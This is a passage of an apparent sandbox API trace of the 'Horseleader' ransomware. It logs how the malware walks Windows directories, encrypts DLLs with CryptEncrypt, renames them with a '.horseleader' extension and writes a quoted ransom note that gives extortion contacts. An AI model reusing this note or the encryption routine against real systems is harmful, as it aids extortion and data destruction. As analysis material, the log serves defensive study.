Shared\\Fonts\\#Decrypt#.txt") 
returned 83 [0250.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.626] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.626] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.627] lstrlenA (lpString="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") returned 1368 [0250.627] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.628] CloseHandle (hObject=0x158) returned 1 [0250.628] GetProcessHeap () returned 0x780000 [0250.628] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.628] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Fonts", cAlternateFileName="")) returned 0 [0250.628] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.628] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\#Decrypt#.txt") returned 77 [0250.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c 
[0250.629] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.629] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.630] lstrlenA (lpString="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") returned 1368 [0250.630] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.630] CloseHandle (hObject=0x21c) returned 1 [0250.630] GetProcessHeap () returned 0x780000 [0250.630] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.630] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VSTO", cAlternateFileName="")) returned 1 [0250.630] lstrcmpiW (lpString1="VSTO", lpString2="Windows") returned -1 [0250.630] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned 55 [0250.630] lstrcmpW (lpString1="VSTO", lpString2=".") returned 1 [0250.630] lstrcmpW (lpString1="VSTO", lpString2="..") returned 1 [0250.630] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.630] GetProcessHeap () returned 0x780000 [0250.630] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7dbfd8 [0250.630] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*") returned 57 [0250.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.632] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.632] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\.") returned 57 [0250.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.632] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.632] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.632] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\..") returned 58 [0250.632] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.632] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.632] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="10.0", cAlternateFileName="")) returned 1 [0250.632] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0250.632] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned 60 [0250.632] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0250.632] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0250.632] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.632] GetProcessHeap () returned 0x780000 [0250.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.632] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*") returned 62 [0250.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.636] lstrcmpiW (lpString1=".", lpString2="Windows") 
returned -1 [0250.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\.") returned 62 [0250.636] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="..", cAlternateFileName="")) returned 1 [0250.636] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\..") returned 63 [0250.636] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="1033", cAlternateFileName="")) returned 1 [0250.636] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0250.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") returned 65 [0250.636] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0250.636] 
lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0250.636] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.636] GetProcessHeap () returned 0x780000 [0250.636] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.636] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*") returned 67 [0250.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0250.637] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.637] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\.") returned 67 [0250.638] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.638] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="..", cAlternateFileName="")) returned 1 [0250.638] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.638] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\..") returned 68 [0250.638] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.638] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.638] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0250.638] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="Windows") returned -1 [0250.638] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0250.638] StrStrIW (lpFirst="VSTOInstallerUI.dll", lpSrch=".horseleader") returned 0x0 [0250.638] lstrcmpW (lpString1="VSTOInstallerUI.dll", lpString2="#Decrypt#.txt") returned 1 [0250.638] lstrcmpW (lpString1="VSTOInstallerUI.dll", lpString2="_uninstalling_.png") returned 1 [0250.638] lstrlenW (lpString=".testttjffg") returned 11 [0250.638] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", lpSrch=".testttjffg") returned 0x0 [0250.638] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.638] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, 
pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0250.639] StrStrW (lpFirst="VSTOInstallerUI.dll", lpSrch=".txt") returned 0x0 [0250.639] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=10080) returned 1 [0250.639] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2760, lpOverlapped=0x0) returned 1 [0250.642] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd8a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.642] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2760, lpOverlapped=0x0) returned 1 [0250.642] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.642] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.642] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, 
lpOverlapped=0x0) returned 1 [0250.643] CloseHandle (hObject=0x15c) returned 1 [0250.643] GetProcessHeap () returned 0x780000 [0250.643] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.643] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.horseleader") returned 97 [0250.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.horseleader")) returned 1 [0250.644] GetProcessHeap () returned 0x780000 [0250.644] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.644] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0250.644] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="Windows") returned -1 [0250.644] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0250.645] StrStrIW (lpFirst="VSTOLoaderUI.dll", lpSrch=".horseleader") returned 0x0 
[0250.645] lstrcmpW (lpString1="VSTOLoaderUI.dll", lpString2="#Decrypt#.txt") returned 1 [0250.645] lstrcmpW (lpString1="VSTOLoaderUI.dll", lpString2="_uninstalling_.png") returned 1 [0250.645] lstrlenW (lpString=".testttjffg") returned 11 [0250.645] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", lpSrch=".testttjffg") returned 0x0 [0250.645] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.645] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.645] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.647] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0250.647] StrStrW (lpFirst="VSTOLoaderUI.dll", lpSrch=".txt") returned 0x0 [0250.647] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=18264) returned 1 [0250.647] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4758, lpOverlapped=0x0) returned 1 [0250.650] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb8a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.650] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4758, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4758, lpOverlapped=0x0) returned 1 [0250.650] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.651] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.651] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.651] CloseHandle (hObject=0x15c) returned 1 [0250.651] GetProcessHeap () returned 0x780000 [0250.651] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.651] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.horseleader") returned 94 [0250.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.horseleader")) returned 1 [0250.652] GetProcessHeap () returned 0x780000 [0250.652] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.652] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, 
